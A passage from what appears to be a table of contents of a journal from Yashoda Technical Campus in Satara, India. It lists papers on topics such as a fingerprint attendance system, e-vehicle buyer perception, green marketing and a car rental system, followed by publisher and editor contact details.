Ms Smita Chavan 1Mr.Amit More 1 Mr.Sunil Lembhe 2 YSPM’s Yashoda Technical Campus Satara.(MH) India. ssc_civilpoly@yes.edu.in
43-46View
9Fingerprint Based Biometric Attendance System using Arduino
AvishkarMulik1,PavanBhandalkar2,AnupDhavan3, Mr.S.S.Mane4
1, 2, 3, Student’s & 4Asst.Prof.Department of E&TC, Yashoda Technical Campus, Satara
E-mail: avishkarmulk2001@gmail.com
47-51View
10Buyer’s Perception of E-vehicle in Satara
By Dr. Rajashri Ramesh Chavan, Associate Professor and Mst. Shubham Siddeshwar Jadhav(MBA-II) Yashoda Shikshan Prasarak Mandal’s Yashoda Technical Campus Vadhe Phata, Satara. Email- rrc_mba@yes.edu.in
52-63View
11Green Marketing: Adoptions in Industry
By Prof.Jadhav Snehal Suryakant Assistant Professor Yashoda Technical Campus , Wadhe,Satara Email-ssj_mca@yes.edu.in
64-66View
12Car Rental System
1.Dr. Sunita Jadhav , Associate Prof., Department of Master of Computer Applications,
2.Pragati Mulik, Sahil Pathan,, Harshad Sutar, Shreyas Parkhi.
Students of B.Tech, Department of Computer Science Engineering
67-71View

CONTCAT

PUBLISHERCHIEF-EDITOR

Yashoda Shikshan Sanstha’s,
Yashoda Technical Campus,
Wadhe, Satara

E-Mail : principalpharma_ytc@yes.edu.in
Web : www.yes.edu.in
Contact : +91-9172220775, +91-9822027806
Dr. R. R. Chavan
Associate Professor, Faculty of MBA
Yashoda Technical Campus,
Wadhe, Satara
E-Mail : editior_ymrj@yes.edu.in
Web : www.yes.edu.in
Contact : +91-9823550823